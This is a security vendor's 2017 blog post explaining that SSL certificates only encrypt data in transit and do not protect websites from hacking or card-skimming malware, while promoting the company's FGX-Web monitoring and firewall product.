logo.png
Guided Website Threat Review

Foregenix Blog

Why an SSL certificate won’t protect your website, but FGX-Web will.

,09/10/17 14:24

Having an SSL (Secure Sockets Layer) certificate on your website is important and it's also a good thing to have. The little green padlock in the corner of your browser indicates that your website is legitimate and that any data transmitted between the website and the website visitor will be encrypted. It also results in increased trust from consumers.

Despite this, most people misunderstand what protection the SSL certificate provides to a website and it's visitors. Let me explain...

SSL is a system that encrypts a message between a sender and a receiver to avoid being seen by a third party.  It enables your website visitor to send their data securely to your web server, where it is received and processed. In order to utilise the security of this communication method, your website requires an SSL certificate. You can spot an SSL certified website because the web address will begin with ‘https’ instead of ‘http’.

http.png

Image taken from Comodo

The SSL certificate ensure that communication between your website visitor and your website is encrypted and secure.  This is hugely important, but what needs to be understood is that it only protects the data whilst it’s in transit.

So, what does this mean exactly?

When the customer is making a purchase using your online store, SSL encrypts the transaction data from the point where the customer types in their credit card details and hits ‘Submit’.  When it reaches your web server, this information is decrypted and processed to complete the payment. If someone was to intercept the encrypted data in transit to the web server server they would not be able to use the data as it is encrypted.

When a customer types their card details into the payment page on your website, they can see the numbers and information being typed into the webpage. Its only once they press submit that it gets scrambled to come across the internet.

SSL-1.png

This means that if their PC has malware, someone could be sat harvesting the data they’re typing in. SSL does not protecting them from keyloggers, viruses, trojans, worms or any other kind of malware that has infected their computer. Criminals can still siphon that card data from their PC regardless of the SSL certificate.

In a very similar manner, your website and your customer data is still vulnerable to criminals too. SSL does not provide any form of protection for your website outside of encrypting the transmission of data between your customer and your website. If your website only has SSL and no additional protection measures, you’re leaving it wide open to a targeted attack.

If your website has been hacked and credit card harvesting malware has been planted on your website, the criminals will be able to steal your customer data just as easily whether you have an SSL certificate or not.

Criminals have even found ways to create malicious websites and get them SSL secured with genuine certificates. The idea behind this is that visitors will be more likely to trust the website as a genuine site rather than seeing it for what it is - a malicious site.

Graham Edgecombe from Netcraft told SC Magazine:

"The tech industry has been telling users for years, if you want to enter credit card information on a website make sure it's got a padlock, make sure it's using SSL. But now anyone can go and get an SSL certificate for £5 or so, using minimal information, but it's verified.

All the certificate authorities (CA) will check is that you own the domain name, and that's it. Some of them don't even check that the domain may be misused. One of the rules imposed on certificate authorities is they have to give additional scrutiny to domain names that may be used for fraudulent purposes, but these rules are quite vague."

Whilst SSL encryption is important, it’s more important to take a holistic approach to your website security.

The actual act of securing a website can be a complex process. SSL does not stop attackers from hacking a website.  It will not stop an attacker from exploiting software vulnerabilities or brute forcing your access controls.

FGX-Web is a security solution that bakes-in security to protect websites. Unlike SSL, FGX-Web will actively search your website for indicators of compromise, including credit card harvesting code, webshells, backdoors and other malware and notify you of its presence.  

The solution provides protection and security monitoring to enable online businesses to defend against web based attacks. Alongside this protection it also provides a wealth of analytical information, allowing you access to clear risk profiling.

SSL2.png

 

How will FGX-Web protect your website? Through FGX-Web you have access to:

An advanced web application firewall (WAF)

A WAF will filter attacks out of  incoming traffic before they hit your website. It will examine not only the source of the traffic, but its intention. It can determine whether the person is placing legitimate requests for web pages, or trying to attempt a hack. If an attempted hack is detected, the attack is blocked. Whereas innocent traffic passes freely.

Malware scanning

Our malware scanner runs at minimum every day (it can be set by the user to run a lot more frequently) and is designed to search a website for all known forms of malware, including but not limited to:

  • Webshells
  • Credit card harvesting code
  • Backdoors
  • Spyware

Cardholder data scans

In addition to a malware scan, you also get access to a scan specifically designed to seek out stored, unprotected payment card data on your website. To reduce your risk of data compromise and to maintain PCI compliance, you cannot keep unprotcted payment card data stored on your site. It might not always be the case that it’s been stored intentionally.  Sometimes a customer may put their card information in an incorrect field, or malware is storing the data in a file somewhere for later collection by the criminal. Our scan will detect this data and notify you.

File change monitoring

Using our advanced file monitoring system, we are able to log any and all changes made to your website. If a change is made, we will alert you of the time, date and file location so that you can verify its legitimacy.

Website Security Specialists to call for help

Our team of Threat Intelligence Analysts support our FGX-Web clients on a daily basis - helping to quickly manage threats and protect websites from attacks.  As an FGX-Web client, our team becomes your team.

As you can see SSL protection is simply one of the important components of website protection. The importance of having proper, effective security in place for your website cannot be understated. Hopefully, this article has given you a better idea of what you can do to improve your website's security measures.

TRENDING POSTS

Kirsty Trainer
The "Key" to Secure Data - P2PE - Derived Unique Key Per Transaction (DUKPT)

Written by Andrew McKenna, PCI QSA, PCIP at Foregenix The encryption key infrastructure usually ...

Read More
Duncan Slater
Alert: Major UK Payment Service Provider iFrame Man-In-The-Middle Breach

The Foregenix Digital Forensics and Incident Response Team recently reported a man-in-the-middle ...

Read More

Cyber Security Insights

Jake Dennys
17/10/17 10:33

Foregenix Highly Commended at Fraud Awards 2017

Earlier this year we were shortlisted for a prestige award at Fraud Awards 2017, presented by Retail Risk. Judges had selected Foregenix as a ...

Read More

Jake Dennys
09/10/17 14:24

Why an SSL certificate won’t protect your website, but FGX-Web will.

Having an SSL (Secure Sockets Layer) certificate on your website is important and it's also a good thing to have. The little green padlock in the ...

Read More

Mike Hinton
04/10/17 10:55

Is My Hosting Provider Protecting My Website?

Recently, it was discovered that over 14 million Verizon customers data, including PIN’s, had been exposed on an unprotected web server.  Three ...

Read More

Jake Dennys
28/09/17 10:21

We're Showcasing Cybersecurity at Ecommerce Expo 2017!

Flyers printed, banners set up, scanners prepped, we are officially at Ecommerce Expo 2017! It’s our first year at the show and we’ve hit the road to ...

Read More

Paul Taylor
25/09/17 12:09

Responsible Disclosure of Zero-Day Vulnerabilities Discovered in NfSen and AlienVault OSSIM

Part 1 of 2 – Introduction and Background NfSen is an open source netflow data capture and analysis module which can be used as a standalone product, ...

Read More